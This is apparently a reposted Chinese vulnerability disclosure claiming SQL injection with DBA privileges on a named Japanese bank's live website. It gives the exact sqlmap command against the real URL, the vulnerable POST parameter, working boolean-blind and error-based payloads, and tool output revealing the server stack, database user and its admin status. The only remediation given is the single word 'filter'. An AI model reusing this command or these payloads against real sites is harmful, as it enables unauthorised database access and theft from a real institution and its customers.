日本東和銀行存在SQL注入(DBA权限)
程序员文章站
2022-07-07 22:18:35
Microsoft SQL Server 2012!!!
website: http://www.towabank.co.jp/index.asp
python s...
Microsoft SQL Server 2012!!!
website: http://www.towabank.co.jp/index.asp python sqlmap.py -u "http://www.towabank.co.jp/index.asp" -p MenuNo --technique=BE --form --random-agent
---
Parameter: MenuNo (POST)
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)
Payload: MenuNo=(SELECT (CASE WHEN (4746=4746) THEN CHAR(118)+CHAR(87)+CHAR(71)+CHAR(120) ELSE 4746*(SELECT 4746 FROM master..sysdatabases) END))
Type: error-based
Title: Microsoft SQL Server/Sybase error-based - Parameter replace
Payload: MenuNo=(CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(113)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3061=3061) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(107)+CHAR(113))))
---
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, Microsoft IIS 8.5, ASP
back-end DBMS: Microsoft SQL Server 2012
current user: 'FsolAdmin'
current user is DBA: True
database management system users [1]:
[*] ##MS_AgentSigningCertificate##
解决方案:
过滤